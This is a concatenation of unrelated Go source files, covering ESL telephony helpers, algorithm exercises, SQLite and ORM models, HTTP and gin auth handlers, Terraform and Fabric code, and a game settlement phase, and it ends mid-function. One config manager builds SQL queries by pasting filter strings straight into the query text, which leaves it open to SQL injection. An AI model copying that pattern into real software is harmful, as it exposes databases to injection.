// Set - Helper that you can use to execute SET application against active ESL session
func (sc *SocketConnection) ExecuteSet(ctx context.Context, key string, value string, sync bool) (m *Message, err error) {
return sc.Execute(ctx, "set", key+"="+value, sync)
}
// ExecuteHangup - Helper desgned to help with executing Answer against active ESL session
func (sc *SocketConnection) ExecuteAnswer(ctx context.Context, args string, sync bool) (m *Message, err error) {
return sc.Execute(ctx, "answer", args, sync)
}
// ExecuteHangup - Helper desgned to help with executing Hangup against active ESL session
func (sc *SocketConnection) ExecuteHangup(ctx context.Context, uuid string, args string, sync bool) (m *Message, err error) {
if uuid != "" {
return sc.ExecuteUUID(ctx, uuid, "hangup", args, sync)
}
return sc.Execute(ctx, "hangup", args, sync)
}
// BgApi - Helper designed to attach api in front of the command so that you do not need to write it
func (sc *SocketConnection) Api(ctx context.Context, command string) error {
return sc.Send(ctx, "api "+command)
}
// BgApi - Helper designed to attach bgapi in front of the command so that you do not need to write it
func (sc *SocketConnection) BgApi(ctx context.Context, command string) error {
return sc.Send(ctx, "bgapi "+command)
}
// Connect - Helper designed to help you handle connection. Each outbound server when handling needs to connect e.g. accept
// connection in order for you to do answer, hangup or do whatever else you wish to do
func (sc *SocketConnection) Connect(ctx context.Context) error {
return sc.Send(ctx, "connect")
}
// Exit - Used to send exit signal to ESL. It will basically hangup call and close connection
func (sc *SocketConnection) Exit(ctx context.Context) error {
return sc.Send(ctx, "exit")
}
|
package main
import (
"math"
"sort"
)
func threeSumClosest(nums []int, target int) int {
sort.Ints(nums)
n := len(nums)
res := 0
mindiff := math.MaxInt32
for i := 0; i < n-2; i++ {
left := i + 1
right := n - 1
for left < right {
cur := nums[i] + nums[left] + nums[right]
curDiff := abs(cur, target)
if curDiff == 0 {
return cur
}
if curDiff < mindiff {
res = cur
mindiff = curDiff
}
if cur < target {
left++
} else {
right--
}
}
}
return res
}
func abs(a, b int) int {
if a > b {
return a - b
}
return b - a
}
|
package main
import (
"database/sql"
"fmt"
"strings"
"time"
"github.com/gtfierro/xboswave/ingester/types"
"github.com/immesys/wavemq/mqpb"
_ "github.com/mattn/go-sqlite3"
)
// these are addressable true/false values used internally for the RequestFilter
var _FALSE = false
var _TRUE = true
type ArchiveRequest struct {
// message schema this request applies to
// (this is a field in the WAVEMQ wrapper)
Schema string
// path to the plugin to use to extract
// timeseries data (e.g. plugins/dent.so)
// Path should end in .so
Plugin string
// the URI we subscribe to
URI types.SubscriptionURI
// reported values
// time this archive request was created
Inserted time.Time
// the text of the last error this archive request experienced
LastError string
// what time that error occured
ErrorTimestamp time.Time
// whether or not this archive request is active
Enabled bool
// unique identifier
Id int
}
type subscription struct {
S mqpb.WAVEMQ_SubscribeClient
stop chan struct{}
uri types.SubscriptionURI
timer *ExponentialBackoff
}
type ConfigManager struct {
db *sql.DB
}
func NewCfgManager(cfg *Config) (*ConfigManager, error) {
var err error
cfgmgr := &ConfigManager{}
cfgmgr.db, err = sql.Open("sqlite3", cfg.Store.Path)
if err != nil {
return nil, err
}
// set up tables
_, err = cfgmgr.db.Exec(`CREATE TABLE IF NOT EXISTS requests (
id INTEGER PRIMARY KEY,
schema TEXT NOT NULL,
plugin TEXT NOT NULL,
namespace TEXT NOT NULL,
resource TEXT NOT NULL,
inserted DATETIME DEFAULT CURRENT_TIMESTAMP,
lastError TEXT,
enabled BOOLEAN,
errorTimestamp DATETIME DEFAULT NULL
);`)
return cfgmgr, err
}
type RequestFilter struct {
Schema *string
Plugin *string
Namespace *string
Resource *string
HasError *bool
Enabled *bool
Id *int
}
func (cfgmgr *ConfigManager) Add(req ArchiveRequest) error {
filter := &RequestFilter{
Schema: &req.Schema,
Plugin: &req.Plugin,
Namespace: &req.URI.Namespace,
Resource: &req.URI.Resource,
}
results, err := cfgmgr.List(filter)
if err != nil {
return err
} else if len(results) == 0 {
stmt := "INSERT INTO requests(schema, plugin, namespace, resource, enabled) VALUES (?, ?, ?, ?, 1);"
_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
return err
}
return nil
}
// deletes the request from the config manager; returns true if anyone else uses the same subscription URI
func (cfgmgr *ConfigManager) Delete(req ArchiveRequest) (bool, error) {
stmt := "DELETE FROM requests WHERE schema=? AND plugin=? AND namespace=? AND resource=?;"
_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
if err != nil {
return true, err
}
filter := &RequestFilter{
Namespace: &req.URI.Namespace,
Resource: &req.URI.Resource,
}
existingSubs, err := cfgmgr.List(filter)
return len(existingSubs) > 0, err
}
func (cfgmgr *ConfigManager) Disable(req ArchiveRequest) (bool, error) {
stmt := "UPDATE requests SET enabled = 0 WHERE schema=? AND plugin=? AND namespace=? AND resource=?;"
_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
if err != nil {
return true, err
}
filter := &RequestFilter{
Namespace: &req.URI.Namespace,
Resource: &req.URI.Resource,
Enabled: &_TRUE,
}
existingSubs, err := cfgmgr.List(filter)
return len(existingSubs) > 0, err
}
func (cfgmgr *ConfigManager) Enable(req ArchiveRequest) error {
stmt := "UPDATE requests SET enabled = 1 WHERE schema=? AND plugin=? AND namespace=? AND resource=?;"
_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
return err
}
func (cfgmgr *ConfigManager) MarkErrorURI(uri types.SubscriptionURI, subErr string) error {
if subErr == "" {
return nil
}
stmt := "UPDATE requests SET lastError = ?, errorTimestamp = ? WHERE namespace = ? AND resource = ?"
_, err := cfgmgr.db.Exec(stmt, subErr, time.Now(), uri.Namespace, uri.Resource)
return err
}
func (cfgmgr *ConfigManager) ClearErrorURI(uri types.SubscriptionURI) error {
stmt := "UPDATE requests SET lastError = '', errorTimestamp = '' WHERE namespace = ? AND resource = ?"
_, err := cfgmgr.db.Exec(stmt, uri.Namespace, uri.Resource)
return err
}
func (cfgmgr *ConfigManager) List(filter *RequestFilter) ([]ArchiveRequest, error) {
stmt := "SELECT schema, plugin, namespace, resource, inserted, ifnull(lastError, ''), errorTimestamp, enabled, id FROM requests"
if filter == nil {
stmt += ";"
} else {
var filters []string
if filter.Schema != nil {
filters = append(filters, fmt.Sprintf("schema='%s' ", *filter.Schema))
}
if filter.Plugin != nil {
filters = append(filters, fmt.Sprintf("plugin='%s' ", *filter.Plugin))
}
if filter.Namespace != nil {
filters = append(filters, fmt.Sprintf("namespace='%s' ", *filter.Namespace))
}
if filter.Resource != nil {
filters = append(filters, fmt.Sprintf("resource='%s' ", *filter.Resource))
}
if filter.Id != nil {
filters = append(filters, fmt.Sprintf("id='%d' ", *filter.Id))
}
if filter.HasError != nil {
if *filter.HasError {
filters = append(filters, fmt.Sprint("lastError!='' "))
} else {
filters = append(filters, fmt.Sprint("lastError='' "))
}
}
if filter.Enabled != nil {
if *filter.Enabled {
filters = append(filters, fmt.Sprint("enabled=1 "))
} else {
filters = append(filters, fmt.Sprint("enabled=0 "))
}
}
stmt = fmt.Sprintf("%s WHERE %s;", stmt, strings.Join(filters, " AND "))
}
var results []ArchiveRequest
rows, err := cfgmgr.db.Query(stmt)
if err != nil {
return results, err
}
defer rows.Close()
for rows.Next() {
row := &ArchiveRequest{
URI: types.SubscriptionURI{},
}
var et interface{}
if err := rows.Scan(&row.Schema, &row.Plugin, &row.URI.Namespace, &row.URI.Resource, &row.Inserted, &row.LastError, &et, &row.Enabled, &row.Id); err != nil {
return results, err
}
if et != nil {
row.ErrorTimestamp = et.(time.Time)
} else {
row.ErrorTimestamp = time.Unix(0, 0)
}
results = append(results, *row)
}
return results, nil
}
|
package models
import (
"time"
)
type AuthUser struct {
Id int64 `xorm:"pk autoincr"`
Password string `xorm:"varchar(128) not null"`
LastLogin time.Time `xorm:"DateTime not null"`
IsSuperuser bool `xorm:"BOOL not null"`
Username string `xorm:"varchar(64) unique not null"`
FirstName string `xorm:"varchar(30) not null"`
LastName string `xorm:"varchar(30) not null"`
Email string `xorm:"varchar(254) not null"`
IsStaff bool `xorm:"BOOL not null"`
IsActive bool `xorm:"BOOL not null"`
DateJoined time.Time `xorm:"DateTime not null"`
}
func (self *AuthUser) TableName() string {
return "auth_user"
}
func GetAuthUser(id int64) (au *AuthUser, err error) {
au = new(AuthUser)
var existed bool
if existed, err = DB().Id(id).Get(au); err != nil {
return nil, err
}
if !existed {
return nil, nil
}
return
}
|
package requests
import (
"github.com/sirupsen/logrus"
"gopkg.in/xmlpath.v2"
"strings"
)
type Xpath struct {
Node *xmlpath.Node
Err error
Path *xmlpath.Path
}
func (self *Xpath) New(sHtml string) {
rdHtml := strings.NewReader(sHtml)
self.Node, self.Err = xmlpath.ParseHTML(rdHtml)
}
func (self *Xpath) Parse2Str(sXpath string) string {
var sResult string
if pathComp, errComp := xmlpath.Compile(sXpath); errComp == nil {
iter := pathComp.Iter(self.Node)
//beego.Debug(pathComp.String(self.Node))
if iter.Next() {
sResult = iter.Node().String()
}
} else {
logrus.Error(errComp)
}
return sResult
}
func (self *Xpath) Parse2Sli(sXpath string) []string {
var sliResult []string
pathComp := xmlpath.MustCompile(sXpath)
iter := pathComp.Iter(self.Node)
for iter.Next() {
sliResult = append(sliResult, iter.Node().String())
}
return sliResult
}
|
package api
import (
"encoding/json"
"log"
"net/http"
)
type messageGetRequest struct {
Chat string
}
type message struct {
Id string `json:"id"`
Chat string `json:"chat"`
Author string `json:"author"`
Text string `json:"text"`
Created_at string `json:"created_at"`
}
func(s *ServerAPI) FetchChatsMessages(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "Wrong request method", http.StatusBadRequest)
return
}
var from messageGetRequest
if err := json.NewDecoder(r.Body).Decode(&from); err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
// Проверяем существует ли данный чат
if count, err := countEntity(s.Conn, &from.Chat, "Chats"); err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
} else if count == 0 {
http.Error(w, "Given chat does not exist!", http.StatusBadRequest)
return
}
// Обращаемся к базе за сообщениями
const query_str = "SELECT * FROM Messages WHERE chat=$1 ORDER BY created_at"
rows, err := s.Conn.Query(query_str, from.Chat)
if err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
defer rows.Close()
// Конструируем ответ
msg_array := []message{}
for rows.Next() {
cur_msg := message{}
if err := rows.Scan(
&cur_msg.Id,
&cur_msg.Chat,
&cur_msg.Author,
&cur_msg.Text,
&cur_msg.Created_at,
); err != nil {
log.Println(err)
continue
}
msg_array = append(msg_array, cur_msg)
}
json.NewEncoder(w).Encode(msg_array)
w.WriteHeader(http.StatusOK)
}
|
// Copyright 2017 Vlad Didenko. All rights reserved.
// See the included LICENSE.md file for licensing information
package slops // import "go.didenko.com/slops"
// ExcludeAll returns a new slice where all strings from the
// rejects slice are removed from the src slice, regardless of
// how many times they occur in either slice. Non-excluded
// duplicates in the src slice are preserved. Both slices
// are expected to be sorted.
func ExcludeAll(src, rejects []string) []string {
return CollectExcludedAll(src, rejects, GetAll)
}
// CollectExcludedAll applies a Collector to every item which is
// in src slice but not in the rejects slice. All strings from
// the rejects slice are removed from the src slice, regardless
// of how many times they occur in either slice. Non-excluded
// duplicates in the src slice are preserved. Both input slices
// are expected to be sorted.
func CollectExcludedAll(src, rejects []string, collect Collector) []string {
filtered := make([]string, 0)
for i, j := 0, 0; i < len(src); {
if j >= len(rejects) || src[i] < rejects[j] {
filtered = collect(filtered, src[i])
i++
continue
}
if src[i] > rejects[j] {
j++
continue
}
// last option is src[i] == rejects[j]
i++
}
return filtered
}
// CollectExcludedByCount applies a Collector to every item which
// is in src slice but not in the rejects slice. Only as many
// duplicates removed from the src slice as occur in the rejects
// slice. Both input slices are expected to be sorted.
func CollectExcludedByCount(src, rejects []string, collect Collector) []string {
return CollectVariety(src, rejects, collect, NoOp, NoOp)
}
// ExcludeAllContrived is a companion function to
// CollectExcludedAllContrived. This is a nerdy exercise
// and is not intended for production use.
func ExcludeAllContrived(src, rejects []string) []string {
return CollectExcludedAllContrived(src, rejects, GetAll)
}
// CollectExcludedAllContrived has exactly the same functionality
// as CollectExcludedAll function (and is tested against the same
// use cases) but is slower and is presented to demonstrate how
// similar effects can be achieved from the generalised function
// CollectVariety via functional programming means. This is merely
// a nerdy exercise and is not intended for production use.
func CollectExcludedAllContrived(src, rejects []string, collect Collector) []string {
var lastExcluded string
return CollectVariety(
src,
rejects,
func(dest []string, item string) []string {
if item != lastExcluded {
return collect(dest, item)
}
return dest
},
func(dest []string, item string) []string {
lastExcluded = item
return dest
},
NoOp)
}
|
package main
import "fmt"
type Student struct {
Name string
Age int
}
func main() {
//创建结构体变量时候指定属性的值
stu := Student{"test", 10}
fmt.Println(stu)
var stu1 = Student{"test", 22}
fmt.Println(stu1)
//创建结构体变量时候指定属性名和属性值写在一起
stu2 := Student{
Name: "ZCR",
Age: 20,
}
fmt.Println(stu2)
var stu3 = Student{
Name: "ZCR1",
Age: 200,
}
fmt.Println(stu3)
//创建返回一个结构体指针类型
var stu5 = &Student{
Name: "ZCR1",
Age: 200,
}
//两种获取属性的方式都可以,底层会处理
fmt.Println((*stu5).Name)
fmt.Println(stu5.Name)
stu6 := &Student{
Name: "ZCR1",
Age: 200,
}
//两种获取属性的方式都可以,底层会处理
fmt.Println((*stu6).Name)
fmt.Println(stu6.Name)
stu7 := &Student{"test", 10}
fmt.Println(*stu7)
var stu8 = &Student{"test", 22}
fmt.Println(*stu8)
}
|
package pgeo
import (
"database/sql/driver"
"errors"
"fmt"
)
// Lseg is a line segment and is represented by pairs of points that are the endpoints of the segment.
type Lseg [2]Point
// Value for the database
func (l Lseg) Value() (driver.Value, error) {
return valueLseg(l)
}
// Scan from sql query
func (l *Lseg) Scan(src interface{}) error {
return scanLseg(l, src)
}
func valueLseg(l Lseg) (driver.Value, error) {
return fmt.Sprintf(`[%s]`, formatPoints(l[:])), nil
}
func scanLseg(l *Lseg, src interface{}) error {
if src == nil {
*l = NewLseg(Point{}, Point{})
return nil
}
points, err := parsePointsSrc(src)
if err != nil {
return err
}
if len(points) != 2 {
return errors.New("wrong lseg")
}
*l = NewLseg(points[0], points[1])
return nil
}
func randLseg(nextInt func() int64) Lseg {
return Lseg([2]Point{randPoint(nextInt), randPoint(nextInt)})
}
// Randomize for sqlboiler
func (l *Lseg) Randomize(nextInt func() int64, fieldType string, shouldBeNull bool) {
*l = randLseg(nextInt)
}
|
package minedive
import (
"nhooyr.io/websocket"
)
type ClientOptions struct {
WSopts websocket.DialOptions
}
|
package searching
func LinearSearch(items []int, data int) bool {
for _, key := range items {
if key == data {
return true
}
}
return false
}
|
package admin
import (
"encoding/json"
admin "github.com/hxangel/bot/libs/admin"
)
type Index struct {
AdminBase
}
func (c *Index) Index() {
menu := admin.NewMenu()
views, err := json.Marshal(menu.Views)
if err == nil {
c.Assign("JsonViews", string(views))
}
menus, err := json.Marshal(menu.Menus)
if err == nil {
c.Assign("JsonMenus", string(menus))
c.Assign("Menus", menu.Menus)
}
}
func (c *Index) Default() {
}
|
package main
import (
"fmt"
"net/http"
"net/url"
"time"
"github.com/medhir/musicbrainz/server"
"github.com/rs/cors"
"github.com/medhir/musicbrainz/server/mbclient"
)
// BaseURL is the API Endpoint for the Musicbrainz client
const BaseURL = "https://musicbrainz.org/ws/2/"
// UserAgent provides a description of the application to be sent with Musicbrainz API requests
const UserAgent = "Medhir's Musicbrainz Client App / v0.1 / Contact: mail AT medhir.com"
func main() {
httpClient := &http.Client{
Timeout: time.Second * 10}
parsedURL, _ := url.Parse(BaseURL)
client := &mbclient.MBClient{
BaseURL: parsedURL,
UserAgent: UserAgent,
HTTPClient: httpClient}
mux := http.NewServeMux()
c := cors.New(cors.Options{
Debug: true,
AllowCredentials: true,
AllowedMethods: []string{http.MethodGet, http.MethodPost, http.MethodPut, http.MethodDelete},
AllowedHeaders: []string{"Authorization", "Content-Type"}})
server := server.NewServer(mux, client)
fmt.Println("Listening on port 8080...")
err := http.ListenAndServe(":8080", c.Handler(server.Router))
if err != nil {
fmt.Println(err.Error())
return
}
}
|
package sonarqube
import (
"fmt"
"github.com/hashicorp/terraform-plugin-sdk/helper/schema"
sonargo "github.com/labd/sonargo/sonar"
)
func resourceSettingsValue() *schema.Resource {
return &schema.Resource{
Create: resourceSettingsValueCreate,
Read: resourceSettingsValueRead,
Update: resourceSettingsValueUpdate,
Delete: resourceSettingsValueDelete,
Importer: &schema.ResourceImporter{
State: schema.ImportStatePassthrough,
},
Schema: map[string]*schema.Schema{
"key": {
Type: schema.TypeString,
Required: true,
},
"value": {
Type: schema.TypeString,
Required: true,
},
},
}
}
func resourceSettingsValueCreate(d *schema.ResourceData, m interface{}) error {
client := m.(*sonargo.Client)
_, err := client.Settings.Set(&sonargo.SettingsSetOption{
Key: d.Get("key").(string),
Value: d.Get("value").(string),
})
if err != nil {
return err
}
d.SetId(d.Get("key").(string))
return nil
}
func resourceSettingsValueRead(d *schema.ResourceData, m interface{}) error {
client := m.(*sonargo.Client)
results, _, err := client.Settings.Values(&sonargo.SettingsValuesOption{
Keys: d.Id(),
})
if err != nil {
return err
}
if len(results.Settings) == 0 {
return fmt.Errorf("No project found with key %s", d.Id())
}
d.Set("key", results.Settings[0].Key)
d.Set("value", results.Settings[0].Value)
return nil
}
func resourceSettingsValueUpdate(d *schema.ResourceData, m interface{}) error {
client := m.(*sonargo.Client)
if d.HasChange("key") {
oldKey, newKey := d.GetChange("key")
_, err := client.Settings.Reset(&sonargo.SettingsResetOption{
Keys: oldKey.(string),
})
if err != nil {
return err
}
d.SetId(newKey.(string))
}
_, err := client.Settings.Set(&sonargo.SettingsSetOption{
Key: d.Get("key").(string),
Value: d.Get("value").(string),
})
if err != nil {
return err
}
return nil
}
func resourceSettingsValueDelete(d *schema.ResourceData, m interface{}) error {
client := m.(*sonargo.Client)
_, err := client.Settings.Reset(&sonargo.SettingsResetOption{
Keys: d.Id(),
})
if err != nil {
return err
}
d.SetId("")
return nil
}
|
package main
import (
"fmt"
"io/ioutil"
"log"
"os"
"path"
"strings"
"github.com/fogleman/nes/nes"
)
func testRom(path string) (err error) {
defer func() {
if r := recover(); r != nil {
err = r.(error)
}
}()
console, err := nes.NewConsole(path)
if err != nil {
return err
}
console.StepSeconds(3)
return nil
}
func main() {
args := os.Args[1:]
if len(args) != 1 {
log.Fatalln("Usage: go run util/roms.go roms_directory")
}
dir := args[0]
infos, err := ioutil.ReadDir(dir)
if err != nil {
panic(err)
}
for _, info := range infos {
name := info.Name()
if !strings.HasSuffix(name, ".nes") {
continue
}
name = path.Join(dir, name)
err := testRom(name)
if err == nil {
fmt.Println("OK ", name)
} else {
fmt.Println("FAIL", name)
fmt.Println(err)
}
}
}
|
package core
import (
"encoding/json"
"er"
"fwb"
"sgs"
)
type playerSData struct {
Cereals int
Meat int
Sweater int
}
type pstData struct {
ps map[int]*playerSData
}
func pstInit(me *gameImp) *er.Err {
me.lg.Dbg("Enter Round Settlement phase")
me.pd = &pstData{
ps: make(map[int]*playerSData),
}
me.setDCE(fwb.CMD_COMMIT_ROUND_SETTLEMENT, pstOnCommitRoundSettlement)
me.setTimer(30000, pstOnTimeOut)
return me.app.SendAllPlayers(sgs.Command{
ID: fwb.CMD_ROUND_SETTLEMENT,
Who: fwb.CMD_WHO_APP,
})
}
func parsePlayerSData(me *gameImp, command sgs.Command) (*playerSData, *er.Err) {
bytePsd, err := json.Marshal(command.Payload)
if err != nil {
return nil, er.Throw(fwb.E_CMD_PAYLOAD_NOT_DECODABLE, er.EInfo{
"details": "failed to decode command payload",
"commandID": command.ID,
"payload": command.Payload,
}).To(me.lg)
}
psd := playerSData{}
err = json.Unmarshal(bytePsd, &psd)
if err != nil {
return nil, er.Throw(fwb.E_CMD_PAYLOAD_NOT_DECODABLE, er.EInfo{
"details": "failed to decode command payload",
"commandID": command.ID,
"payload": command.Payload,
}).To(me.lg)
}
return &psd, nil
}
func pstOnCommitRoundSettlement(me *gameImp, command sgs.Command) *er.Err {
pid := command.Who
if me.gd.GetPDIndex(pid) < 0 {
return er.Throw(fwb.E_CMD_INVALID_CLIENT, er.EInfo{
"details": "invalid player ID when commit round settlement",
"ID": pid,
})
}
pd := me.pd.(*pstData)
psd, err := parsePlayerSData(me, command)
if err != nil {
return err
}
if !validateSettlement(me, pid, *psd) {
err = me.app.SendToPlayer(pid, sgs.Command{
ID: fwb.CMD_ROUND_SETTLEMENT_INVALID,
Who: fwb.CMD_WHO_APP,
})
return err
}
pd.ps[pid] = psd
pn := len(me.app.GetPlayers())
if len(pd.ps) == pn {
return applyPS(me)
}
return err
}
func applyPS(me *gameImp) *er.Err {
pd := me.pd.(*pstData)
for k, v := range pd.ps {
printPS(me, k, *v)
hearts := v.Cereals*2 + v.Meat*3 + v.Sweater*2
px := me.gd.GetPDIndex(k)
hl := me.gd.PData[px][fwb.PD_HOUSE_LV]
if hl == 1 {
hearts += 1
} else if hl == 2 {
hearts += 2
} else if hl >= 2 {
hearts += 4
}
delta := make(fwb.PlayerData, fwb.PD_MAX)
delta[fwb.PD_PT_HEART] = hearts
delta[fwb.PD_PT_CEREALS] = -v.Cereals
delta[fwb.PD_PT_MEAT] = -v.Meat
delta[fwb.PD_PT_SWEATER] = -v.Sweater
me.gd.PData[px] = fwb.PDAdd(me.gd.PData[px], delta)
}
printRoundInfo(me)
err := me.app.SendAllPlayers(sgs.Command{
ID: fwb.CMD_ROUND_SETTLEMENT_UPDATE,
Who: fwb.CMD_WHO_APP,
Payload: me.gd,
})
if err.Importance() >= er.IMPT_DEGRADE {
return err
}
return me.gotoPhase(_P_ROUNDS_FINISH)
}
func printPS(me *gameImp, cid int, pst playerSData) {
me.alg.Inf("Settlement from player %v: Cereals %v, Meat %v, and Sweater %v", me.app.GetPlayer(cid).Name(), pst.Cereals, pst.Meat, pst.Sweater)
}
func pstOnTimeOut(me *gameImp, command sgs.Command) *er.Err {
pd := me.pd.(*pstData)
for _, p := range me.gd.PData {
_, found := pd.ps[p[fwb.PD_CLIENT_ID]]
if !found {
me.app.SendToMockPlayer(p[fwb.PD_CLIENT_ID], sgs.Command{
ID: fwb.CMD_ROUND_SETTLEMENT,
Who: fwb.CMD_WHO_APP,
})
}
}
return nil
}
func validateSettlement(me *gameImp, playerID int, psd playerSData) bool {
px := me.gd.GetPDIndex(playerID)
cerealsHas := me.gd.PData[px][fwb.PD_PT_CEREALS]
meatHas := me.gd.PData[px][fwb.PD_PT_MEAT]
sweaterHas := me.gd.PData[px][fwb.PD_PT_SWEATER]
maxPawns := me.gd.PData[px][fwb.PD_MAX_PAWNS]
return psd.Cereals >= 0 && psd.Cereals <= cerealsHas &&
psd.Meat >= 0 && psd.Meat <= meatHas &&
psd.Sweater >= 0 && psd.Sweater <= sweaterHas &&
psd.Cereals+psd.Meat <= maxPawns &&
psd.Sweater <= maxPawns
}
|
/*
Copyright SecureKey Technologies Inc. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package mocks
import (
fab "github.com/hyperledger/fabric-sdk-go/api/apifabclient"
"github.com/hyperledger/fabric-sdk-go/pkg/fabric-client/txn"
"github.com/pkg/errors"
)
// MockTransactor provides an implementation of Transactor that exposes all its context.
type MockTransactor struct {
Ctx fab.Context
ChannelID string
Orderers []fab.Orderer
}
// CreateTransactionID creates a Transaction ID based on the current context.
func (t *MockTransactor) CreateTransactionID() (fab.TransactionID, error) {
txid, err := txn.NewID(t.Ctx)
if err != nil {
return fab.TransactionID{}, errors.WithMessage(err, "new transaction ID failed")
}
return txid, nil
}
// CreateChaincodeInvokeProposal creates a Transaction Proposal based on the current context and channel config.
func (t *MockTransactor) CreateChaincodeInvokeProposal(request fab.ChaincodeInvokeRequest) (*fab.TransactionProposal, error) {
txid, err := t.CreateTransactionID()
if err != nil {
return nil, errors.WithMessage(err, "create transaction ID failed")
}
tp, err := txn.CreateChaincodeInvokeProposal(txid, t.ChannelID, request)
if err != nil {
return nil, errors.WithMessage(err, "new transaction proposal failed")
}
return tp, nil
}
// SendTransactionProposal sends a TransactionProposal to the target peers.
func (t *MockTransactor) SendTransactionProposal(proposal *fab.TransactionProposal, targets []fab.ProposalProcessor) ([]*fab.TransactionProposalResponse, error) {
return txn.SendProposal(t.Ctx, proposal, targets)
}
// CreateTransaction create a transaction with proposal response.
func (t *MockTransactor) CreateTransaction(request fab.TransactionRequest) (*fab.Transaction, error) {
return txn.New(request)
}
// SendTransaction send a transaction to the chain’s orderer service (one or more orderer endpoints) for consensus and committing to the ledger.
func (t *MockTransactor) SendTransaction(tx *fab.Transaction) (*fab.TransactionResponse, error) {
return txn.Send(t.Ctx, tx, t.Orderers)
}
|
package handler
import (
"net/http"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/entity"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/helper"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/request"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/response"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/services"
"github.com/gin-gonic/gin"
)
type authHandler struct {
userServices services.UserServices
jwtService services.JWTServices
}
func NewAuthHandler(userServices services.UserServices, jwtService services.JWTServices) *authHandler {
return &authHandler{userServices, jwtService}
}
func (h *authHandler) Register(c *gin.Context) {
var req request.RequestAuthRegister
errReq := c.ShouldBind(&req)
if errReq != nil {
response := helper.ResponseFormatter(http.StatusBadRequest, "error", "invalid", nil)
c.AbortWithStatusJSON(http.StatusBadRequest, response)
return
}
validationErr := validate.Struct(req)
if validationErr != nil {
errorFormatter := helper.ErrorFormatter(validationErr)
errorMessage := helper.M{"error": errorFormatter}
response := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
c.AbortWithStatusJSON(http.StatusBadRequest, response)
return
}
if h.userServices.UserIsExist(req.Username) {
response := helper.ResponseFormatter(http.StatusBadRequest, "error", "User is alerady registered!", nil)
c.AbortWithStatusJSON(http.StatusConflict, response)
return
}
newUser, err := h.userServices.CreateUser(req)
if err != nil {
errorFormatter := helper.ErrorFormatter(err)
errorMessage := helper.M{"error": errorFormatter}
response := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
c.JSON(http.StatusBadRequest, response)
return
}
generatedToken := h.jwtService.GenerateToken(newUser)
userData := response.ResponseUserFormatter(newUser)
data := response.ResponseUserDataFormatter(userData, generatedToken)
response := helper.ResponseFormatter(http.StatusOK, "success", "User sucessfully registered.", data)
c.JSON(http.StatusOK, response)
}
func (h *authHandler) Login(c *gin.Context) {
var req request.RequestAuthLogin
err := c.ShouldBind(&req)
if err != nil {
response := helper.ResponseFormatter(http.StatusBadRequest, "error", "invalid", nil)
c.AbortWithStatusJSON(http.StatusBadRequest, response)
return
}
validationErr := validate.Struct(req)
if validationErr != nil {
errorFormatter := helper.ErrorFormatter(validationErr)
errorMessage := helper.M{"error": errorFormatter}
response := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
c.AbortWithStatusJSON(http.StatusBadRequest, response)
return
}
credential := h.userServices.VerifyCredential(req.Username, req.Password)
if v, ok := credential.(entity.Users); ok {
generatedToken := h.jwtService.GenerateToken(v)
userData := response.ResponseUserFormatter(v)
data := response.ResponseUserDataFormatter(userData, generatedToken)
response := helper.ResponseFormatter(http.StatusOK, "success", "User sucessfully registered.", data)
c.JSON(http.StatusOK, response)
return
}
response := helper.ResponseFormatter(http.StatusUnauthorized, "error", "Cannot log in!", nil)
c.AbortWithStatusJSON(http.StatusUnauthorized, response)
}
func (h *authHandler) ForgetPassword(c *gin.Context) {
var req request.RequestAuthForgetPassword
err := c.ShouldBind(&req)
if err != nil {
response := helper.ResponseFormatter(http.StatusBadRequest, "error", "invalid", nil)
c.AbortWithStatusJSON(http.StatusBadRequest, response)
return
}
validationErr := validate.Struct(req)
if validationErr != nil {
errorFormatter := helper.ErrorFormatter(validationErr)
errorMessage := helper.M{"error": errorFormatter}
response := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
c.AbortWithStatusJSON(http.StatusBadRequest, response)
return
}
EmailIsExist := h.userServices.EmailIsExist(req)
if !EmailIsExist {
response := helper.ResponseFormatter(http.StatusBadRequest, "error", "User with this email is not registered.", nil)
c.AbortWithStatusJSON(http.StatusBadRequest, response)
return
}
}
|
package shortestCompletingWord
import (
"testing"
"fmt"
)
func TestShortest(t *testing.T) {
cases := []struct {
plate string
words []string
output string
}{
{"1s3 PSt", []string{"step", "steps", "stripe", "stepple"}, "steps"},
{"1s3 456", []string{"looks","pest","stew","show"}, "pest"},
{"Ah71752", []string{"suggest","letter","of","husband","easy","education","drug","prevent","writer","old"}, "husband"},
}
for _, c := range cases {
t.Run("completion", func(t *testing.T) {
got := shortestCompletingWord(c.plate, c.words)
fmt.Println(got)
if got != c.output {
t.Errorf("fail %s", c.plate)
}
})
}
}
|
package generator
import (
"bytes"
"fmt"
"go/ast"
"strconv"
"strings"
"time"
"unicode"
"unicode/utf8"
)
func formatComment(comment string) string {
if comment == "" {
return ""
}
buf := bytes.NewBuffer(nil)
lines := strings.Split(comment, "\n")
for i := range lines {
// Last line contains an empty string.
if lines[i] == "" && i == len(lines)-1 {
continue
}
if i != 0 {
buf.WriteString("\n")
}
buf.WriteString("// ")
buf.WriteString(lines[i])
}
return buf.String()
}
func findStructTypeParamsAndFields(packages map[string]*ast.Package, typeName string) ([]*ast.Field, []*ast.Field) {
decls := getDecls(packages)
for _, decl := range decls {
genDecl, ok := decl.(*ast.GenDecl)
if !ok {
continue
}
for _, spec := range genDecl.Specs {
